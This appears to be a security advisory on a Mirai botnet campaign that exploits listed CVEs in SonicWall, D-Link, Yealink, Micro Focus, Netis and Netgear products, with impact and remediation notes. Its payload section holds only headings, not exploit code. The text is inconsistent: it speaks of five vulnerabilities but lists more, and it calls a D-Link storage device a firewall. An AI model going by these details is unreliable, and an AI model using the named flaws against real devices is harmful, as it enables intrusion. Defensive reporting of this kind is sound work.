Severity

High

Analysis Summary

Five known vulnerabilities are being actively exploited to serve a Mirai variant. These attacks are actively going on and upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers. 

The exploitation of vulnerabilities being exploited include:

• VisualDoor — a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January
• CVE-2020-25506 – a D-Link DNS-320 firewall remote code execution (RCE) vulnerability
• CVE-2021-27561 and CVE-2021-27562 – Two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges
• CVE-2021-22502 – an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40
• CVE-2019-19356 – a Netis WF2419 wireless router RCE exploit, and
• CVE-2020-26919 – a Netgear ProSAFE Plus RCE vulnerability

Payloads of Exploits

1. VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability

2. CVE-2020-25506: D-Link DNS-320 Firewall Remote Command Execution Vulnerability

3. CVE-2021-27561 and CVE-2021-27562: Yealink Device Management Pre-Auth ‘root’ Level Remote Code Execution Vulnerability

4. CVE-2021-22502: Micro Focus Operation Bridge Reporter (OBR) Remote Code Execution

5. CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution Vulnerability

Impact

• Remote code execution
• Command Injection
• Pre-Auth ‘root’ Level Remote Code Execution

Affected Vendors

• Sonicwall
• D-Link
• Netgear
• Netis
• Yealink

Remediation

• It is strongly advised to customers to apply patches whenever possible.
• Filtering of malicious URL and malicious domains.
• Search for IOCs in your environment.